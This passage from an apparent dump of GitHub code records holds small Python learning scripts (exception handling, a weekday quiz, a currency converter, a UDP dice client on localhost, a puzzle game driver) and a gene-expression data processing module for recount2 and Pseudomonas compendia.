iddict[Eingabe]:\r\n print(value,\",\",seqdict[value],\",\",numdict[value])\r\nexcept:\r\n print(\"Please enter a motif ID after your JSON file\")\r\n\r\njson_file.close","repo_name":"HighCaffeineIntake/Python-Projects","sub_path":"json2Pythonlibrary.py","file_name":"json2Pythonlibrary.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28422188533","text":"lista = [1, 10]\n\ntry:\n divisao = 10 / 0 \n #numero = lista[3]\n #x = a\n\n numero = lista[1]\n\nexcept ZeroDivisionError:\n print(\"Não é possível dividir por 0.\")\n#except:\n # print(\"Erro desconhecido\")\nexcept BaseException as ex:\n print(\"Erro desconhecido {}\".format(ex))\n \n#parte do código que depende que não tenha nenhum erro\nelse:\n print('Executa quando não ocorre exceção')\n\n#vai executar de qualquer maneira\nfinally:\n print('Sempre executa')","repo_name":"Fer-code/Python","sub_path":"FirstPythonProjects/Excecoes_personalizadas.py","file_name":"Excecoes_personalizadas.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38858239989","text":"# 题目:请输入星期几的第一个字母来判断一下是星期几,如果第一个字母一样,则继续判断第二个字母。\n\nweekDict = {'M':'Monday', 'T':{'u': 'Tuesday', 'h':'Thursday'}, 'W':'Wednesday', 'F':'Friday', \n\t'S':{'a':'Saturday', 'u':'Sunday'}}\n\nday = input('输入第一个字母:')\nday = day.upper()\n\nif day in ['T', 'S']:\n\tday2 = 
input('输入第二个字母:')\n\tprint(weekDict[day][day2])\nelse:\n\tprint(weekDict[day])","repo_name":"EruDev/Python-Practice","sub_path":"菜鸟教程100例/31.py","file_name":"31.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11750224827","text":"'''\n John O'Connell\n CS5001\n Fall 2021\n Final Project\n Main Driver for the CS5001 Puzzle Slide Game\n'''\n\nfrom game import *\nimport turtle\n\ndef main():\n\n # sets up the game window\n screen_setup()\n # runs the splash screen to start the game\n splash_screen()\n # gets name and number of moves from user\n player_name, max_moves = get_user_input()\n # creates the gameboard frame\n create_gameboard()\n # process' the puzzle selection, mario puzzle to start\n current_puzz = process_selection('mario.puz', player_name, max_moves)\n # runs the game ui\n run_game_ui(current_puzz)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"John-OConnell/Sliding_Puzzle_Game","sub_path":"puzzle_game.py","file_name":"puzzle_game.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12852982412","text":"#program that converts a currency to another\n\namount_euro = float(input('Input amount of Euro here: '))\nexchange_rate = float(10.85)\namount_nok = amount_euro * exchange_rate\n\nif amount_euro < 0:\n print('Amount must be >= 0. Please try again.')\nelse:\n print('Amount of NOK:', amount_nok)","repo_name":"DavidKuhestani/Python_programs","sub_path":"practical 3/p4-5p1.py","file_name":"p4-5p1.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72302176760","text":"#%%\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom micro_ch_pre import micro_ch_pre\nfrom prepare_fft import prepare_fft\nfrom _plot import dim3_plot as myplt3\nimport glob\nimport os\nfrom _save import save_3d_plot as save\nfrom PIL import Image\n\ndirname = 'output_2023-11-17-16-05-52'\n\n# ------------------------------------------------------------------------\n# ファイルの読み込み\n# ------------------------------------------------------------------------\n# 数字順にファイル名をソートするための関数\ndef numerical_sort(value):\n value = os.path.basename(value)\n parts = value.split('_') # ファイル名をアンダースコアで分割\n if len(parts) == 2:\n try:\n return int(parts[1].split('.')[0]) # 数字部分を抜き出して整数に変換\n except ValueError:\n return value\n return value\n\nfile_pattern = os.path.join(f\"result/{dirname}/res\", '*con*')\nfile_list = glob.glob(file_pattern)\nsorted_file_list = sorted(file_list, key=numerical_sort)\n\n#%%\n# ------------------------------------------------------------------------\n# jpeg画像の保存\n# ------------------------------------------------------------------------\n\nos.mkdir(f\"result/{dirname}/pic\")\nfor i, file_path in enumerate(sorted_file_list):\n if os.path.isfile(file_path): # ファイルかどうかを確認\n dat = np.load(file_path)\n base = save.get_base_name(file_path)\n\n fig = plt.figure()\n myplt3.display_3d_matrix(dat, False, False)\n plt.savefig(f\"result/{dirname}/pic/{base}.jpeg\", dpi=200, format=\"jpeg\")\n plt.show()\n#%%\n\n# ------------------------------------------------------------------------\n# gifの作成\n# ------------------------------------------------------------------------\nfile_pattern = os.path.join(f\"result/{dirname}/pic\", '*con*')\nfile_list = glob.glob(file_pattern)\nsorted_file_list = 
sorted(file_list, key=numerical_sort)\n\nimage_list = []\nfor filename in sorted_file_list:\n if filename.endswith('.jpeg') or filename.endswith('.jpg'):\n # JPEGファイルを開く\n img = Image.open(filename) \n image_list.append(img)\n\noutput_file = f\"result/{dirname}/output.gif\"\nimage_list[0].save(output_file, save_all=True, append_images=image_list[1:], duration=100, loop=0)\n\n#%%\n","repo_name":"Tan-Furukawa/phase_filed","sub_path":"binary_monoclinic_3d/make_gif.py","file_name":"make_gif.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28004880850","text":"\"\"\"user_access_history_action\n\nRevision ID: 3a553fb8b911\nRevises: 138ca0a2b975\nCreate Date: 2023-01-27 16:03:25.497058\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"3a553fb8b911\"\ndown_revision = \"138ca0a2b975\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column(\n \"user_access_history\", sa.Column(\"action\", sa.String(), nullable=True)\n )\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column(\"user_access_history\", \"action\")\n # ### end Alembic commands ###\n","repo_name":"AndreiUkladchikov/YandexPracticumTeam","sub_path":"flask_app/alembic/versions/3a553fb8b911_user_access_history_action.py","file_name":"3a553fb8b911_user_access_history_action.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6267006834","text":"\"\"\"tests.py\"\"\"\n\nimport pytest\n\nfrom .schema import Schema, encode, decode, EncodeException\n\nclass TestSchema(Schema):\n prop1: str = 'required'\n prop2: int\n\ndef test_encoding():\n encoded = encode(TestSchema, {\n 'prop1': 'a property',\n 'prop2': 2\n })\n assert encoded.prop1 == 'a property'\n assert encoded.prop2 == 2\n\ndef test_type_validation():\n with pytest.raises(TypeError):\n encoded = encode(TestSchema, {\n 'prop1': 'a property',\n 'prop2': 'not an integer'\n })\n\ndef test_required_constraint():\n encoded1 = encode(TestSchema, {'prop1': 'a property'})\n assert encoded1.prop1 == 'a property'\n assert encoded1.prop2 is None\n with pytest.raises(EncodeException):\n encoded2 = encode(TestSchema, {\n 'prop2': 'missing required prop1',\n })\n\ndef test_decode():\n for index in range(1,5):\n decoded = {'prop1': f'property{index}', 'prop2': index}\n encoded = encode(TestSchema, decoded)\n assert decode(encoded) == decoded\n\n","repo_name":"perintyler/PyObjectValidation","sub_path":"src/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73104327480","text":"from socket import *\nimport pickle\n# Definition der Socket-Parameter\nfrom Tools.scripts.treesync import raw_input\n\nhost = \"127.0.0.1\" # IP-Adresse des Servers\nport = 4711 # Port-Adresse des Servers\naddr = (host, port)\nbuf = 128 # Max. 
Speicher fuer Eingangsdaten\n# Initialisierung eines UDP-Sockets\n\nUDPSock = socket(AF_INET, SOCK_DGRAM)\nshutDown = True\nwhile shutDown:\n prompt = raw_input(\"Geben Sie die gewuenschte Anzahl der Wuerfe ein:>\")\n print(\"Die Eingabe lautet:\", prompt)\n shutDown = False\n\nprint(\"Sending to server\")\nUDPSock.sendto(str(prompt).encode('utf-8'), addr) # ... versenden\n(data, addr) = UDPSock.recvfrom(buf) # warten...\ndata = pickle.loads(data)\nprint()\nprint(\"Folgende Augenzahlen wurden geworfen:\")\nprint(\"( 1er 2er 3er 4er 5er 6er )\")\nprint(\" \", data)\nprint()\n# print(\"Server:\", addr, \" Nachricht:\", int(data))\n","repo_name":"FriedrichKlemm/Python_Uni","sub_path":"ServerClientDice/Client_Dice.py","file_name":"Client_Dice.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18934095849","text":"\"\"\"\nAuthor: Alexandra Lee\nDate Created: 16 June 2020\n\nThis script provide supporting functions to run analysis notebooks.\n\nData processing functions including:\n* function to map ensembl gene ids to hgnc symbols\n* function to remove subsets of samples\n* function to transform data into integer for downstream DE and GSEA analyses\n* function to normalize data\n* function to format pseudomonas pathway data to input to GSEA\n\"\"\"\n\nimport os\nimport pickle\nimport random\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom matplotlib_venn import venn2\nfrom glob import glob\n\n\nfrom sklearn.preprocessing import MinMaxScaler\nfrom ponyo import simulate_expression_data\n\n# Setup function\n\n\ndef set_all_seeds(np_seed=42, rn_seed=12345, tf_seed=1234):\n \"\"\"\n This function sets all seeds to get reproducible VAE trained\n models.\n \"\"\"\n\n # The below is necessary in Python 3.2.3 onwards to\n # have reproducible behavior for certain hash-based operations.\n # See these references for further details:\n # https://keras.io/getting-started/faq/#how-can-i-obtain-reproducible-results-using-keras-during-development\n # https://docs.python.org/3.4/using/cmdline.html#envvar-PYTHONHASHSEED\n # https://github.com/keras-team/keras/issues/2280#issuecomment-306959926\n\n os.environ[\"PYTHONHASHSEED\"] = \"0\"\n\n # The below is necessary for starting Numpy generated random numbers\n # in a well-defined initial state.\n np.random.seed(np_seed)\n\n # The below is necessary for starting core Python generated random numbers\n # in a well-defined state.\n random.seed(rn_seed)\n # The below tf.set_random_seed() will make random number generation\n # in the TensorFlow backend have a well-defined initial state.\n tf.set_random_seed(tf_seed)\n\n\ndef replace_ensembl_ids(expression_df, gene_id_mapping):\n \"\"\"\n Replaces ensembl gene ids with hgnc symbols\n\n Arguments\n ---------\n expression_df: df\n gene expression data matrix (sample x gene)\n gene_id_mapping: df\n Dataframe mapping ensembl ids (used in DE_stats_file) to hgnc symbols,\n used in Crow et. 
al.\n\n    NOTE:\n    -----\n    This function is deprecated due to large memory usage: when `expression_df`\n    is a large dataframe, manipulating it in memory becomes very slow\n    (and sometimes even impossible) due to large memory consumption.\n\n    The same functionality has been refactored into `get_renamed_columns()` and\n    `map_recount2_data()` functions in this module.\n\n    THIS FUNCTION IS KEPT AS A REFERENCE ONLY.\n    \"\"\"\n\n    # Some columns are duplicates, for example:\n    # (ENSG00000223773.7, ENSG00000223773) --> CD99P1\n    # (ENSG00000124334.17, ENSG00000124334) --> IL9R\n    # We keep the first occurrence of duplicated ensembl ids\n    updated_mapping = gene_id_mapping.loc[\n        ~gene_id_mapping.index.duplicated(keep=\"first\")\n    ]\n\n    # The same ensembl id is mapped to two different gene symbols (CCL3L1, CCL3L3)\n    # ENSG00000187510.7 ENSG00000187510 C12orf74\n    # ENSG00000187510.7 ENSG00000187510 PLEKHG7\n    # Manually map them based on what is found on the ensembl site\n    manual_mapping = {\n        \"ENSG00000187510.7\": \"PLEKHG7\",\n        \"ENSG00000230417.11\": \"LINC00595\",\n        \"ENSG00000255374.3\": \"TAS2R45\",\n        \"ENSG00000276085.1\": \"CCL3L1\",\n    }\n\n    # Apply manual mappings to `updated_mapping`\n    for ensembl_id, gene_symbol in manual_mapping.items():\n        updated_mapping.loc[ensembl_id].hgnc_symbol = gene_symbol\n\n    # Remove paralogs.\n    # Some ensembl ids are paralogs (for example, \"geneA\" and \"geneA_PAR_Y\").\n    # They map to the same hgnc symbol. Homologous sequences are paralogous\n    # if they were separated by a gene duplication event: if a gene in an\n    # organism is duplicated to occupy two different positions in the same\n    # genome, then the two copies are paralogous.\n    updated_expression_df = expression_df.iloc[\n        :, ~expression_df.columns.str.contains(\"PAR_Y\")\n    ]\n\n    # Replace ensembl ids with gene symbol\n    updated_expression_df.columns = updated_expression_df.columns.map(\n        updated_mapping[\"hgnc_symbol\"]\n    )\n\n    # Remove columns whose mapped ensembl id is an empty string\n    updated_expression_df = updated_expression_df.iloc[\n        :, updated_expression_df.columns != \"\"\n    ]\n\n    # Remove columns whose mapped ensembl id is `NaN`\n    updated_expression_df = updated_expression_df.iloc[\n        :, updated_expression_df.columns.notnull()\n    ]\n\n    return updated_expression_df\n\n\ndef create_recount2_compendium(download_dir, output_filename):\n    \"\"\"\n    Concatenate `t_data_counts.tsv` in each project directory and create the\n    single recount2 compendium file in TSV format.\n    The first row in each `t_data_counts.tsv` is a header line that includes\n    column names, so only the header in the first `t_data_counts.tsv` is copied\n    to the output file.\n\n    Arguments\n    ---------\n    download_dir: str\n        dirname that hosts all downloaded project data\n    output_filename: str\n        filename of output single compendium data\n    \"\"\"\n\n    data_counts_filenames = glob(f\"{download_dir}/*/t_data_counts.tsv\")\n    data_counts_filenames.sort()\n\n    compendium_header = None\n    with open(output_filename, \"w\") as ofh:\n        for filename in data_counts_filenames:\n            with open(filename) as ifh:\n                file_header = ifh.readline()\n                if compendium_header is None:\n                    compendium_header = file_header\n                    ofh.write(compendium_header)\n                elif file_header != compendium_header:\n                    raise Exception(f\"Inconsistent header in {filename}\")\n\n                file_content = ifh.read()\n                ofh.write(file_content)\n\n\ndef get_published_generic_genes(filename):\n    \"\"\"\n    Get generic genes based on input filename, which could be a URL.\n\n    Arguments\n    ---------\n    filename: str\n        name of 
the file that includes published generic genes\n \"\"\"\n\n df = pd.read_csv(filename, header=0, sep=\"\\t\")\n published_generic_genes = list(df[\"Gene_Name\"])\n return published_generic_genes\n\n\ndef get_merged_gene_id_mapping(gene_id_filename, raw_ensembl_genes):\n \"\"\"\n Merge genes in input gene_id file with the raw ensembl gene IDs.\n\n Arguments\n ---------\n gene_id_filename: str\n filename of input gene IDs;\n raw_ensembl_genes: list\n list of strings (ensembl gene IDs)\n\n Returns\n -------\n Mapping between ensembl ids and hgnc symbols\n \"\"\"\n\n original_gene_id_mapping = pd.read_csv(\n gene_id_filename, header=0, sep=\"\\t\", index_col=0\n )\n\n # Get mapping between ensembl ids with and without version numbers.\n # The genes in `ensembl_genes` has version numbers at the end.\n ensembl_gene_ids = pd.DataFrame(\n data={\n \"ensembl_version\": raw_ensembl_genes,\n \"ensembl_parsed\": [gene_id.split(\".\")[0] for gene_id in raw_ensembl_genes],\n }\n )\n\n # Map ensembl gene ids with version number to gene_id_mapping\n merged_gene_id_mapping = pd.merge(\n original_gene_id_mapping,\n ensembl_gene_ids,\n left_on=\"ensembl_gene_id\",\n right_on=\"ensembl_parsed\",\n how=\"outer\",\n )\n\n # Set `ensembl_version` column as the index\n merged_gene_id_mapping.set_index(\"ensembl_version\", inplace=True)\n\n return merged_gene_id_mapping\n\n\ndef get_renamed_columns(\n raw_ensembl_ids,\n merged_gene_id_mapping,\n manual_mapping,\n DE_prior_filename,\n shared_genes_filename,\n):\n \"\"\"\n Find the new column names and corresponding column indexes.\n\n Arguments\n ---------\n raw_ensembl_ids:\n list of strings (ensembl gene IDs), which are columns names in\n raw recount2 data file;\n merged_gene_id_mapping: DataFrame\n merged gene ID mapping;\n manual_mapping: dict\n dict of manual mapping (key: ensembl_id, value: gene symbol)\n DE_prior_filename: str\n input filename that includes symbols of published generic genes\n shared_genes_filename: str\n name of output pickled file (a list of shared gene symbols)\n\n Returns\n -------\n A tuple that includes two entries. 
The first entry is a list\n of hgnc gene symbols (which will be the new column names in remapped\n recount2 data file; The second entry is a dict whose keys are hgnc gene\n symbols and values are lists of the corresponding indexes of columns in\n the raw recount2 data file (most lists include only one column index.)\n\n \"\"\"\n\n updated_mapping = merged_gene_id_mapping.loc[\n ~merged_gene_id_mapping.index.duplicated(keep=\"first\")\n ]\n for ensembl_id, gene_symbol in manual_mapping.items():\n updated_mapping.loc[ensembl_id].hgnc_symbol = gene_symbol\n\n # Build a dict that maps hgnc symbols to column indexes in raw recount2 data\n hgnc_to_cols = dict()\n for col_idx, ensembl_id in enumerate(raw_ensembl_ids):\n # Skip paralogs (whose ensembl_id includes \"PAR_Y\")\n if \"PAR_Y\" in ensembl_id:\n continue\n\n hgnc_symbol = updated_mapping.loc[ensembl_id].hgnc_symbol\n\n # Skip hgnc gene symbols that are `float` type (NaN) or empty strings\n if type(hgnc_symbol) == float or len(hgnc_symbol) == 0:\n continue\n\n if hgnc_symbol in hgnc_to_cols:\n hgnc_to_cols[hgnc_symbol].append(col_idx)\n else:\n hgnc_to_cols[hgnc_symbol] = [col_idx]\n\n our_gene_ids_hgnc = list(hgnc_to_cols.keys())\n\n published_generic_genes = get_published_generic_genes(DE_prior_filename)\n shared_genes_hgnc = list(\n set(our_gene_ids_hgnc).intersection(published_generic_genes)\n )\n\n # In Python, the order of elements in a list that is converted from a set\n # is non-deterministic, so it is sorted here to have reproducible result.\n shared_genes_hgnc.sort()\n\n # Pickle `shared_genes_hgnc` and save as `shared_genes_filename`\n if not os.path.exists(shared_genes_filename):\n with open(shared_genes_filename, \"wb\") as pkl_fh:\n pickle.dump(shared_genes_hgnc, pkl_fh, protocol=3)\n\n return (shared_genes_hgnc, hgnc_to_cols)\n\n\ndef map_recount2_data(\n raw_filename,\n gene_id_filename,\n manual_mapping,\n DE_prior_filename,\n shared_genes_filename,\n new_filename,\n):\n \"\"\"\n Map the ensembl gene IDs in `raw_filename` to hgnc gene symbols based\n on the header line in `template_filename`, and save the new header\n and corresponding data columns to `new_filename`.\n \"\"\"\n\n # Read the header line of `raw_filename` to get its column names:\n raw_header_df = pd.read_csv(raw_filename, header=0, sep=\"\\t\", nrows=1)\n raw_ensembl_ids = list(raw_header_df.columns)\n if raw_ensembl_ids[0] == \"Unnamed: 0\":\n del raw_ensembl_ids[0]\n\n merged_gene_id_mapping = get_merged_gene_id_mapping(\n gene_id_filename, raw_ensembl_ids\n )\n\n shared_genes_hgnc, hgnc_to_cols = get_renamed_columns(\n raw_ensembl_ids,\n merged_gene_id_mapping,\n manual_mapping,\n DE_prior_filename,\n shared_genes_filename,\n )\n\n col_indexes = list()\n for hgnc in shared_genes_hgnc:\n col_indexes += hgnc_to_cols[hgnc]\n\n output_cols = [\"\"]\n for hgnc in shared_genes_hgnc:\n output_cols += [hgnc] * len(hgnc_to_cols[hgnc])\n output_header = \"\\t\".join(output_cols) + \"\\n\"\n\n with open(new_filename, \"w\") as ofh:\n ofh.write(output_header)\n with open(raw_filename) as ifh:\n for line_num, line in enumerate(ifh):\n if line_num == 0:\n continue\n tokens = line.strip(\"\\n\").split(\"\\t\")\n sample_id = tokens[0].strip('\"')\n input_values = tokens[1:]\n output_values = list()\n for idx in col_indexes:\n output_values.append(input_values[idx])\n ofh.write(sample_id + \"\\t\" + \"\\t\".join(output_values) + \"\\n\")\n\n\ndef process_raw_template_pseudomonas(\n processed_compendium_filename,\n project_id,\n metadata_filename,\n metadata_delimiter,\n 
experiment_id_colname,\n sample_id_colname,\n raw_template_filename,\n):\n \"\"\"\n Create processed pseudomonas template data file based on\n processed compendium file (`compendium_filename`),\n drop sample rows if needed, and save updated\n template data on disk.\n \"\"\"\n\n # Get sample ids associated with selected project id\n sample_ids = simulate_expression_data.get_sample_ids(\n metadata_filename,\n metadata_delimiter,\n experiment_id_colname,\n project_id,\n sample_id_colname,\n )\n\n # Get samples from experiment id\n processed_compendium = pd.read_csv(\n processed_compendium_filename, header=0, index_col=0, sep=\"\\t\"\n )\n template_data = processed_compendium.loc[sample_ids]\n\n template_data.to_csv(raw_template_filename, sep=\"\\t\")\n\n\ndef normalize_compendium(\n mapped_filename, normalized_filename, scaler_filename,\n):\n \"\"\"\n Read the mapped compendium file into memory, normalize it, and save\n both normalized compendium data and pickled scaler on disk.\n \"\"\"\n\n # Read mapped compendium file: ~4 minutes (17 GB of RAM)\n mapped_compendium_df = pd.read_table(\n mapped_filename, header=0, sep=\"\\t\", index_col=0\n )\n print(\n \"input: dataset contains {} samples and {} genes\".format(\n mapped_compendium_df.shape[0], mapped_compendium_df.shape[1]\n )\n )\n\n # 0-1 normalize per gene\n scaler = MinMaxScaler()\n\n # Fitting (2 minutes, ~8 GB of RAM)\n normalized_compendium = scaler.fit_transform(mapped_compendium_df)\n normalized_compendium_df = pd.DataFrame(\n normalized_compendium,\n columns=mapped_compendium_df.columns,\n index=mapped_compendium_df.index,\n )\n\n # Save normalized data on disk: ~17.5 minutes\n normalized_compendium_df.to_csv(normalized_filename, float_format=\"%.3f\", sep=\"\\t\")\n del normalized_compendium_df\n\n # Pickle `scaler` as `scaler_filename` on disk\n with open(scaler_filename, \"wb\") as pkl_fh:\n pickle.dump(scaler, pkl_fh, protocol=3)\n\n\ndef process_raw_compendium_pseudomonas(\n raw_filename, processed_filename, normalized_filename, scaler_filename,\n):\n \"\"\"\n Create processed pseudomonas compendium data file based on raw compendium\n data file (`raw_filename`), and normalize the processed compendium.\n\n Note: This function was designed to processed data from the pseudomonas\n compendium defined in the ADAGE paper\n (https://msystems.asm.org/content/1/1/e00025-15).\n \"\"\"\n\n # Create processed pseudomonas compendium data file\n raw_compendium = pd.read_csv(raw_filename, header=0, index_col=0, sep=\"\\t\")\n\n if raw_compendium.shape[1] != 5549:\n processed_compendium = raw_compendium.T\n else:\n processed_compendium = raw_compendium\n\n assert processed_compendium.shape[1] == 5549\n\n # Save transformed compendium data\n processed_compendium.to_csv(processed_filename, sep=\"\\t\")\n\n # Normalize processed pseudomonas compendium data\n normalize_compendium(processed_filename, normalized_filename, scaler_filename)\n\n\ndef process_raw_compendium_recount2(\n raw_filename,\n gene_id_filename,\n manual_mapping,\n DE_prior_filename,\n shared_genes_filename,\n mapped_filename,\n normalized_filename,\n scaler_filename,\n):\n \"\"\"\n Create mapped recount2 compendium data file based on raw compendium\n data file (`raw_filename`), and normalize the mapped compendium.\n \"\"\"\n\n # Create mapped recount2 compendium data file\n map_recount2_data(\n raw_filename,\n gene_id_filename,\n manual_mapping,\n DE_prior_filename,\n shared_genes_filename,\n mapped_filename,\n )\n\n # Normalize mapped recount2 compendium data\n 
normalize_compendium(mapped_filename, normalized_filename, scaler_filename)\n\n\n# TO DO:\n# Either move to a plot.py function or remove if not needed with new changes\n# Functions related to visualizing trends in generic\n# genes/pathways found\n# * function to generate summary dataframes\n# * function to plot trends\n# * function to compare groups of genes\n\n\ndef merge_abs_raw_dfs(abs_df, raw_df, condition):\n \"\"\"\n This function merges and returns dataframe containing\n summary gene results using absolute value of the test\n statistic and raw test statistic values.\n\n Arguments\n ---------\n abs_df: df\n Summary df using absolute value of test statistic\n raw_df: df\n Summary df using raw value of test statistic\n condition: str\n Condition from E-GEOD-33245. Either '1v2', '1v3', '1v4' or '1v5'\n \"\"\"\n merged_df = abs_df.merge(\n raw_df,\n left_on=\"Gene ID\",\n right_on=\"Gene ID\",\n suffixes=[f\"_grp_{condition}\", f\"_grp_{condition}_raw\"],\n )\n\n return merged_df\n\n\ndef merge_two_conditions_df(\n merged_condition_1_df, merged_condition_2_df, condition_1, condition_2\n):\n \"\"\"\n This function merges and returns summary dataframes across two conditions to\n compare trends. For example, merge summary dataframes between 1v2 and 1v3.\n\n Arguments\n ---------\n merged_condition_1_df: df\n df of results for one of the E-GEOD-33245 conditions ('1v2', '1v3', '1v4' or '1v5')\n returned from `merge_abs_raw_dfs`\n merged_condition_2_df: df\n df of results for another one of the E-GEOD-33245 conditions ('1v2', '1v3', '1v4' or '1v5')\n returned from `merge_abs_raw_dfs`\n condition_1: str\n Condition from E-GEOD-33245 associated with 'merged_condition_1_df'.\n Either '1v2', '1v3', '1v4' or '1v5'\n condition_2: str\n Condition from E-GEOD-33245 associated with 'merged_condition_2_df'.\n Either '1v2', '1v3', '1v4' or '1v5'\n \"\"\"\n merged_all_df = merged_condition_1_df.merge(\n merged_condition_2_df, left_on=\"Gene ID\", right_on=\"Gene ID\"\n )\n merged_all_df[\"max Z score\"] = (\n merged_all_df[\n [f\"abs(Z score)_grp_{condition_1}\", f\"abs(Z score)_grp_{condition_2}\"]\n ]\n .abs()\n .max(axis=1)\n )\n merged_all_df[\"Gene ID Name\"] = (\n merged_all_df[\"Gene ID\"]\n + \" \"\n + merged_all_df[f\"Gene Name_grp_{condition_1}\"].fillna(\"\")\n )\n\n merged_df = merged_all_df[\n [\n \"Gene ID\",\n \"Gene ID Name\",\n f\"Test statistic (Real)_grp_{condition_1}\",\n f\"Test statistic (Real)_grp_{condition_1}_raw\",\n f\"Adj P-value (Real)_grp_{condition_1}\",\n f\"Mean test statistic (simulated)_grp_{condition_1}\",\n f\"Std deviation (simulated)_grp_{condition_1}\",\n f\"Median adj p-value (simulated)_grp_{condition_1}\",\n f\"Test statistic (Real)_grp_{condition_2}\",\n f\"Test statistic (Real)_grp_{condition_2}_raw\",\n f\"Adj P-value (Real)_grp_{condition_2}\",\n f\"Mean test statistic (simulated)_grp_{condition_2}\",\n f\"Std deviation (simulated)_grp_{condition_2}\",\n f\"Median adj p-value (simulated)_grp_{condition_2}\",\n f\"abs(Z score)_grp_{condition_1}\",\n f\"abs(Z score)_grp_{condition_2}\",\n \"max Z score\",\n ]\n ]\n return merged_df\n\n\ndef plot_two_conditions(merged_df, condition_1, condition_2, xlabel, ylabel):\n \"\"\"\n This function plots scatterplot comparing trends across two\n conditions\n\n Arguments\n ---------\n merged_df: df\n Merged df containing results for two conditions of E-GEOD-33245.\n Created from `merge_two_conditions_df`\n condition_1:condition_1: str\n Condition from E-GEOD-33245 associated with 'merged_df'.\n Either '1v2', '1v3', '1v4' 
or '1v5'\n condition_2: str\n Condition from E-GEOD-33245 associated with 'merged_df'.\n Either '1v2', '1v3', '1v4' or '1v5'\n xlabel: str\n Label to describe condition_1\n ylabel: str\n Label to describe condition_2\n\n \"\"\"\n fig, axes = plt.subplots(ncols=2, nrows=1, figsize=(10, 4))\n cmap = sns.cubehelix_palette(start=2.8, rot=0.1, as_cmap=True)\n\n fig_abs = sns.scatterplot(\n data=merged_df,\n x=f\"Test statistic (Real)_grp_{condition_1}\",\n y=f\"Test statistic (Real)_grp_{condition_2}\",\n hue=\"max Z score\",\n size=\"max Z score\",\n linewidth=0,\n alpha=0.7,\n ax=axes[0],\n palette=cmap,\n )\n fig_abs.plot([0, 4], [0, 4], \"--k\")\n\n fig_raw = sns.scatterplot(\n data=merged_df,\n x=f\"Test statistic (Real)_grp_{condition_1}_raw\",\n y=f\"Test statistic (Real)_grp_{condition_2}_raw\",\n hue=\"max Z score\",\n size=\"max Z score\",\n linewidth=0,\n alpha=0.7,\n ax=axes[1],\n palette=cmap,\n )\n fig_raw.plot([-4, 4], [-4, 4], \"--k\")\n\n # Add labels\n fig.suptitle(f\"({xlabel}) vs ({ylabel})\", fontsize=16)\n fig.text(0.5, 0.04, xlabel, ha=\"center\", va=\"center\")\n fig.text(0.06, 0.5, ylabel, ha=\"center\", va=\"center\", rotation=\"vertical\")\n axes[0].set_title(\"using abs(log$_2$ Fold Change)\")\n axes[1].set_title(\"using log$_2$ Fold Change\")\n axes[0].set_xlabel(\"\")\n axes[1].set_xlabel(\"\")\n axes[0].set_ylabel(\"\")\n axes[1].set_ylabel(\"\")\n print(fig)\n\n\ndef get_and_save_DEG_lists(\n merged_one_condition_df, condition, p_threshold, z_threshold\n):\n \"\"\"\n Get list of DEGs using traditional criteria (log2FC and p-value)\n and using z-score cutoff. Return different combinations of gene\n lists.\n\n Arguments\n ---------\n merged_one_condition_df: df\n df of results for one of the E-GEOD-33245 conditions ('1v2', '1v3', '1v4' or '1v5')\n returned from `merge_abs_raw_dfs`\n condition: str\n Condition from E-GEOD-33245 associated with 'merged_one_condition_df'.\n Either '1v2', '1v3', '1v4' or '1v5'\n \"\"\"\n # Get DEGs using traditional criteria\n degs_traditional = list(\n (\n merged_one_condition_df[\n (merged_one_condition_df[f\"Test statistic (Real)_grp_{condition}\"] > 1)\n & (\n merged_one_condition_df[f\"Adj P-value (Real)_grp_{condition}\"]\n < p_threshold\n )\n ]\n .set_index(\"Gene ID\")\n .index\n )\n )\n print(f\"No. of DEGs using traditional criteria: {len(degs_traditional)}\")\n\n # Get predicted specific DEGs using z-score cutoff\n degs_specific = list(\n (\n merged_one_condition_df[\n (merged_one_condition_df[f\"Test statistic (Real)_grp_{condition}\"] > 1)\n & (\n merged_one_condition_df[f\"abs(Z score)_grp_{condition}\"].abs()\n > z_threshold\n )\n ]\n .set_index(\"Gene ID\")\n .index\n )\n )\n print(f\"No. of specific DEGs using z-score: {len(degs_specific)}\")\n\n # Get predicted generic DEGs using z-score cutoff\n # Z-score cutoff was found by calculating the score\n # whose invnorm(0.05/5549). Here we are using a p-value = 0.05\n # with a Bonferroni correction for 5549 tests, which are\n # the number of P. aeruginosa genes\n degs_generic = list(\n (\n merged_one_condition_df[\n (merged_one_condition_df[f\"Test statistic (Real)_grp_{condition}\"] > 1)\n & (\n merged_one_condition_df[f\"abs(Z score)_grp_{condition}\"].abs()\n < z_threshold\n )\n ]\n .set_index(\"Gene ID\")\n .index\n )\n )\n print(f\"No. of generic DEGs using z-score: {len(degs_generic)}\")\n\n # Get intersection of DEGs using traditional and z-score criteria\n degs_intersect = 